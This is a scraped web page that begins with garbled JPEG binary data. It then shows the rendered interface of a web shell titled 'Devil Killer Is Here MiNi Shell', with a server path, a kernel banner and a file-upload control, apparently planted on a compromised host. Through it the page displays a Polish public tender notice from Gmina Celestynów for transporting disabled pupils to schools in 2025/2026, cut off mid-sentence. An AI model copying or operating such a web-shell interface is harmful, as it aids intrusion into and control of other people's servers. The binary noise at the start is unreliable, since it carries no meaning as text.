JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/0026980301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych z terenu Gminy Celestynów do szkół, przedszkoli i placówek oświatowych w roku szkolnym 2025/2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD OBSŁUGI SZKÓŁ GMINY CELESTYNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011490412</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Regucka 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Celestynów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-430</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oswiata@celestynow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.oswiatacelestynow.szkolnybip.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych z terenu Gminy Celestynów do szkół, przedszkoli i placówek oświatowych w roku szkolnym 2025/2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e3b0e09a-ae41-4283-985a-91128b65c3a7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00269803</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00070124/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów niepełnopsrawnych z terenu Gminy Celestynów do szkoł, przedszkoli i placówek oświatowych w roku szkolnym 2025/2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://celestynow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy przetargowej https://celestynow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej lub postaci elektronicznej za pośrednictwem za pośrednictwem platformy przetargowej pod adresem https://celestynow.logintrade.net/rejestracja/ustawowe.html. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, zostały opisane na Platformie Zakupowej Instrukcje<br/>https://celestynow.logintrade.net/rejestracja/instrukcje.html. Wykonawca akceptuje warunki korzystania z powyższej Platformy Zakupowej określone w Instrukcja użytkowników oraz zobowiązuje się korzystając z Platformy Zakupowej i przestrzegać jej postanowień<br/>2. Szczegółowe instrukcje dla wykonawców znajdują się na stronie: https://celestynow.logintrade.net/rejestracja/instrukcje.html<br/>3. Regulamin systemu teleinformatycznego dostępny jest pod adresem: https://celestynow.logintrade.net/rejestracja/regulamin.html<br/>4. Rejestracja do systemu teleinformatycznego dostępna jest pod adresem: https://celestynow.logintrade.net/rejestracja/?<br/>do_not_show_cookie_info=true</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zapisy dotyczące RODO zawarte są w rozdziale XXXVI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zapisy dotyczące RODO zawarte są w rozdziale XXXVI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">01/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 postępowania - Dowóz uczniów niepełnosprawnych z miejsc zamieszkania do Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie ul. Wrzosowa 42, Specjalnego Ośrodka Szkolno - Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, z powrotem ze: Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, Specjalnego Ośrodka Szkolno - Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie ul. Wrzosowa 42 do miejsc zamieszkania.<br/><br/>1.	Przedmiotem zamówienia jest świadczenie usług transportowych polegających na przewozie uczniów niepełnosprawnych zamieszkałych na terenie Gminy Celestynów z domu do szkoły/przedszkola/ośrodka oraz z powrotem wraz z zapewnieniem opieki w czasie dowożenia we wszystkie dni funkcjonowania szkół/przedszkoli/ośrodków, które umożliwiają uczniom realizację obowiązku szkolnego, obowiązku nauki i wychowania przedszkolnego. <br/>2.	Przewóz uczniów będzie się odbywać we wszystkie dni nauki w szkołach/ośrodkach i opieki dydaktyczno – wychowawczej w przedszkolach od poniedziałku do piątku z wyłączeniem przerw w nauce, w tym przerw ustalonych przez placówki i dni dodatkowo wolnych od nauki oraz dni wynikających z ograniczenia funkcjonowania szkół/przedszkoli/ośrodków w systemie stacjonarnym w związku z występowaniem epidemii na terytorium Rzeczypospolitej Polskiej.<br/>3.	Pod pojęciem poniedziałek rozumie się każdy poniedziałek i dzień po dniu wolnym od nauki, pod pojęciem piątek rozumie się piątek i dzień przed dniem wolnym od nauki.<br/>4.	Szacunkowa liczba uczniów dowożonych: 14 w tym dwóch uczniów dojeżdżających w poniedziałek do Internatu i wracających do domu w piątek (liczba uczniów może ulec zmianie: zwiększeniu lub zmniejszeniu).<br/>5.	Planowane są dwa przewozy w ciągu dnia: 1 kurs z miejsc zamieszkania do: Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie ul. Wrzosowa 42, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, 1 kurs powrotny ze: Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, Specjalnego Ośrodka Szkolno - Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie ul. Wrzosowa 42 do miejsc zamieszkania.<br/>6.	Szacunkowa liczba dni dowozu – 209.<br/>7.	Szacunkowa liczba kilometrów przejazdu z uczniami w roku szkolnym 2025/2026: 11280,05 km.<br/>8.	Trasa dowozu uczniów z miejsc zamieszkania do szkół/przedszkoli/ośrodków:<br/>1)	w poniedziałek 14 uczniów, w tym:<br/>a)	1 uczeń do Publicznej Szkoły Podstawowej im. Batalionu „Zośka w Celestynowie ul. Wrzosowa 42, <br/>b)	11 uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul Majowa 17/19 (w tym 2 do internatu), <br/>c)	2 uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8,<br/>2)	od wtorku do piątku – 12 uczniów, w tym: <br/>a)	1 uczeń do Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie ul. Wrzosowa 42,<br/>b)	9 uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 <br/>w Otwocku ul Majowa 17/19,<br/>c)	2 uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Dokładne godziny dowozu ustali przewoźnik z rodzicami zgodnie z planem lekcji. <br/><br/>9.	Trasa powrotu uczniów ze szkół/przedszkoli/ośrodków do miejsc zamieszkania: <br/>1)	poniedziałek-czwartek – 12 uczniów, w tym:<br/>a)	9 uczniów ze Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul Majowa 17/19;<br/>b)	2 uczniów ze Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8;<br/>c)	1 uczeń z Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie, ul. Wrzosowa 42,<br/>2)	w piątek – 14 uczniów, w tym: <br/>a)	11 uczniów ze Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul Majowa 17/19;<br/>b)	2 uczniów ze Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8;<br/>c)	1 uczeń z Publicznej Szkoły Podstawowej im. Batalionu „Zośka” w Celestynowie ul. Wrzosowa 42.<br/><br/><br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w SWZ oraz wzorze umowy (załącznik nr 5 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1.	Zamawiający, w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usług, na podstawie art. 214 ust. 1 pkt. 7) Pzp przewiduje udzielenie zamówień podobnych do zamówienia podstawowego, których przedmiot będzie polegał na powtórzeniu usług podobnych do tych jakie stanowią przedmiot niniejszego zamówienia, a ich wartość została uwzględniona w całkowitej wartości zamówienia i wynosi 40 000 zł. <br/>2.	Ewentualny zakres tych zamówień obejmuje w szczególności usługi związane z dowozem uczniów niepełnosprawnych z terenu Gminy Celestynów do szkół, przedszkoli i placówek oświatowych w roku szkolnym 2025/2026. Sposób realizacji usług odbywać się będzie na zasadach przewidzianych dla realizacji niniejszego przedmiotu zamówienia.<br/>3.	Przewiduje się, że wartość udzielanych zamówień podobnych ustalona zostanie na podstawie dotychczasowych doświadczeń, zgodnie z metodyką przyjętą podczas szacowania wartości zamówienia podstawowego, z uwzględnieniem zmian cen rynkowych. Zamówienia, o których mowa powyżej zostaną udzielone na warunkach określonych w odrębnej umowie – zgodnej z treścią umowy podstawowej (zmianie może ulec termin wykonania lub wynagrodzenie Wykonawcy), po przeprowadzeniu negocjacji z Wykonawcą zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 postępowania - Dowóz uczniów niepełnosprawnych z miejsc zamieszkania do: Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, Niezwyczajnej Szkoły – Społecznej Szkoły Podstawowej z Oddziałami Przedszkolnymi w Józefowie ul. Wawerska 41 i kurs powrotny z: Niezwyczajnej Szkoły – Społecznej Szkoły Podstawowej z Oddziałami Przedszkolnymi w Józefowie ul. Wawerska 41, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8 do miejsc zamieszkania.<br/><br/><br/><br/>1.	Przedmiotem zamówienia jest świadczenie usług transportowych polegających na przewozie uczniów niepełnosprawnych zamieszkałych na terenie Gminy Celestynów z domu do szkoły/przedszkola/ośrodka oraz z powrotem wraz z zapewnieniem opieki w czasie dowożenia we wszystkie dni funkcjonowania szkół/przedszkoli/ośrodków, które umożliwiają dzieciom realizację obowiązku szkolnego, obowiązku nauki i wychowania przedszkolnego.<br/>2.	Przewóz uczniów będzie się odbywać we wszystkie dni nauki w szkołach/ośrodkach i opieki dydaktyczno – wychowawczej w przedszkolach od poniedziałku do piątku z wyłączeniem przerw w nauce, w tym przerw ustalonych przez placówki i dni dodatkowo wolnych od nauki oraz dni wynikających z ograniczenia funkcjonowania szkół/przedszkoli/ośrodków w systemie stacjonarnym w związku z występowaniem epidemii na terytorium Rzeczypospolitej Polskiej.<br/>3.	Pod pojęciem poniedziałek rozumie się każdy poniedziałek i dzień po dniu wolnym od nauki, pod pojęciem piątek rozumie się piątek i dzień przed dniem wolnym od nauki<br/>4.	Szacunkowa liczba uczniów dowożonych: 11 (liczba uczniów może ulec zmianie: zwiększeniu lub zmniejszeniu).<br/>5.	Planowane są dwa przewozy w ciągu dnia: 1 kurs z miejsc zamieszkania do: Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, Niezwyczajnej Szkoły – Społecznej Szkoły Podstawowej z Oddziałami Przedszkolnymi w Józefowie ul. Wawerska 41 i 1 kurs powrotny z: Niezwyczajnej Szkoły – Społecznej Szkoły Podstawowej <br/>z Oddziałami Przedszkolnymi w Józefowie ul. Wawerska 41, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul. Majowa 17/19, Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8 do miejsc zamieszkania.<br/>6.	Szacunkowa liczba dni dowozu – 209.<br/>7.	Szacunkowa liczba kilometrów przejazdu z uczniami w roku szkolnym 2025/2026: <br/>9959,20 km.<br/>8.	Trasa dowozu uczniów z miejsc zamieszkania do szkół/przedszkoli/ośrodków:<br/>1)	od poniedziałku do piątku – 11 dzieci: <br/>a)	3 uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8,<br/>b)	4 uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku <br/>ul Majowa 17/19,<br/>c)	4 uczniów do Niezwyczajnej Szkoły – Społecznej Szkoły Podstawowej z Oddziałami Przedszkolnymi w Józefowie ul. Wawerska 41;<br/>Dokładne godziny odwozu ustali przewoźnik z rodzicami zgodnie z planem lekcji. <br/>9. Trasa powrotu uczniów ze szkół/przedszkoli/ośrodków do miejsc zamieszkania:<br/>1)	poniedziałek-piątek – 11 uczniów, w tym:<br/>a)	3 uczniów ze Specjalnego Ośrodka Szkolno – Wychowawczego Nr 2 w Otwocku ul. Literacka 8,<br/>b)	4 uczniów ze Specjalnego Ośrodka Szkolno – Wychowawczego Nr 1 w Otwocku ul Majowa 17/19;<br/>c)	4 uczniów z Niezwyczajnej Szkoły – Społecznej Szkoły Podstawowej z Oddziałami Przedszkolnymi w Józefowie ul. Wawerska 41.<br/><br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w SWZ oraz wzorze umowy (załącznik nr 5 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1.	Zamawiający, w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usług, na podstawie art. 214 ust. 1 pkt. 7) Pzp przewiduje udzielenie zamówień podobnych do zamówienia podstawowego, których przedmiot będzie polegał na powtórzeniu usług podobnych do tych jakie stanowią przedmiot niniejszego zamówienia, a ich wartość została uwzględniona w całkowitej wartości zamówienia i wynosi 40 000 zł. <br/>2.	Ewentualny zakres tych zamówień obejmuje w szczególności usługi związane z dowozem uczniów niepełnosprawnych z terenu Gminy Celestynów do szkół, przedszkoli i placówek oświatowych w roku szkolnym 2025/2026. Sposób realizacji usług odbywać się będzie na zasadach przewidzianych dla realizacji niniejszego przedmiotu zamówienia.<br/>3.	Przewiduje się, że wartość udzielanych zamówień podobnych ustalona zostanie na podstawie dotychczasowych doświadczeń, zgodnie z metodyką przyjętą podczas szacowania wartości zamówienia podstawowego, z uwzględnieniem zmian cen rynkowych. Zamówienia, o których mowa powyżej zostaną udzielone na warunkach określonych w odrębnej umowie – zgodnej z treścią umowy podstawowej (zmianie może ulec termin wykonania lub wynagrodzenie Wykonawcy), po przeprowadzeniu negocjacji z Wykonawcą zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty 